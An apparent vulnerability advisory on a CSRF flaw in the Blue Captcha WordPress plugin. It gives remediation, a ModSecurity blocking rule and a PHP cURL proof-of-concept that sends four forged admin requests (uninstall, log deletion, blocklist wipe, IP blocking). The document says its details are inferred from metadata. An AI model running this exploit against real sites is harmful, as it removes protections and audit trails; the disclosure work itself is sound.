Atomic Edge analysis of CVE-2026-10552 (metadata-based): Blue Captcha <= 2.0.1 for WordPress contains multiple Cross-Site Request Forgery (CSRF) vulnerabilities affecting its admin panel. These allow unauthenticated attackers to uninstall the plugin, delete logs, remove Hall of Shame entries, and block arbitrary IPs by tricking an admin into clicking a malicious link. The CVSS score is 4.3 (medium severity) due to the need for user interaction and limited integrity impact.
The root cause, confirmed by Atomic Edge analysis of the vulnerability description, is a complete absence of nonce validation across all administrative actions. The plugin uses a generic 'blcap_action' parameter in $_REQUEST to route operations including plugin_uninstall(), delete_logs(), delete_ip_db(), and update_option('blcap_settings') for IP blocking. No wp_verify_nonce(), check_admin_referer(), or check_ajax_referer() calls exist anywhere in the codebase. This is inferred from the description's explicit statement and the CWE-352 classification.
Exploitation requires an attacker to craft a malicious link or form that sends a request to /wp-admin/admin.php?page=blcap_main_page (or subpages like blcap_hall_of_shame, blcap_log) with the blcap_action parameter set to one of the destructive values. For example, to uninstall the plugin, the attacker would link to /wp-admin/admin.php?page=blcap_main_page&blcap_action=blcap_uninstall. To add an IP to the block list, they would include update_option parameters. The attacker must trick a logged-in administrator into clicking this link (e.g., via email or a phishing page), as the request will be processed with the admin's session cookies.
Remediation requires the developer to add CSRF nonce verification for every administrative action. Each handler should call check_admin_referer() with a unique action name before performing any destructive operation. WordPress provides wp_nonce_url() for URLs and wp_nonce_field() for forms, along with check_admin_referer() for validation. Absent a patch, site administrators should remove the plugin or restrict admin access to trusted users only.
The impact includes complete plugin uninstallation (losing captcha functionality), deletion of security audit logs, clearing the Hall of Shame which tracks suspicious IPs, and adding attacker-controlled IPs to the block list (potentially causing denial of service for legitimate users or hiding attacker IPs from future scanning). Since this is a CSRF, it does not allow data theft or privilege escalation directly, but the integrity modifications can degrade site security and availability.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-10552 (metadata-based)
# This rule blocks CSRF exploitation attempts against Blue Captcha admin endpoints
# by matching requests to known vulnerable pages with destructive blcap_action values.
SecRule REQUEST_URI "@rx /wp-admin/admin.php"
"id:20261055,phase:2,deny,status:403,msg:'CVE-2026-10552 - Blue Captcha CSRF via blcap_action parameter',severity:'CRITICAL',tag:'CVE-2026-10552',chain"
SecRule ARGS_GET:page "@rx ^blcap_" "chain"
SecRule ARGS:blcap_action "@pm blcap_uninstall delete_logs delete_ip_db update_option" "t:none"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-10552 - Blue Captcha <= 2.0.1 - CSRF via blcap_action Parameter
// This script demonstrates four destructive CSRF attacks against Blue Captcha.
// It uses cURL to send forged requests. The attacker must trick a logged-in admin
// into triggering these requests (e.g., via an HTML form auto-submit or a direct link).
$target_url = 'http://example.com'; // Change to the target WordPress site URL
// Attack 1: Uninstall the plugin
$uninstall_url = $target_url . '/wp-admin/admin.php?page=blcap_main_page&blcap_action=blcap_uninstall';
echo "[+] Attempting plugin uninstall via: $uninstall_urln";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $uninstall_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_hash=test; wordpress_sec_hash=test'); // attacker must provide a valid admin session
curl_setopt($ch, CURLOPT_HEADER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($http_code == 200) {
echo "[+] Uninstall request sent. Check plugin status.n";
} else {
echo "[!] Uninstall request returned HTTP $http_coden";
}
curl_close($ch);
// Attack 2: Delete audit logs
$log_url = $target_url . '/wp-admin/admin.php?page=blcap_log&blcap_action=blcap_delete_logs';
echo "[+] Attempting log deletion via: $log_urln";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $log_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_hash=test; wordpress_sec_hash=test');
curl_setopt($ch, CURLOPT_HEADER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "[+] Log deletion request sent (HTTP $http_code).n";
curl_close($ch);
// Attack 3: Delete Hall of Shame (IP blocklist)
$hos_url = $target_url . '/wp-admin/admin.php?page=blcap_hall_of_shame&blcap_action=blcap_delete_ip_db';
echo "[+] Attempting Hall of Shame deletion via: $hos_urln";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $hos_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_hash=test; wordpress_sec_hash=test');
curl_setopt($ch, CURLOPT_HEADER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "[+] Hall of Shame deletion request sent (HTTP $http_code).n";
curl_close($ch);
// Attack 4: Add arbitrary IP to block list (via POST to update_option)
$block_ip_url = $target_url . '/wp-admin/admin.php?page=blcap_main_page';
$ip_to_block = '192.168.1.100'; // IP address the attacker wants to block
$payload = array(
'blcap_action' => 'update_option',
'blcap_settings' => array(
'blocked_ips' => array(
'192.168.1.100'
)
)
);
echo "[+] Attempting to block IP $ip_to_block via POST to: $block_ip_urln";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $block_ip_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_hash=test; wordpress_sec_hash=test');
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "[+] IP blocking request sent (HTTP $http_code).n";
curl_close($ch);
?>
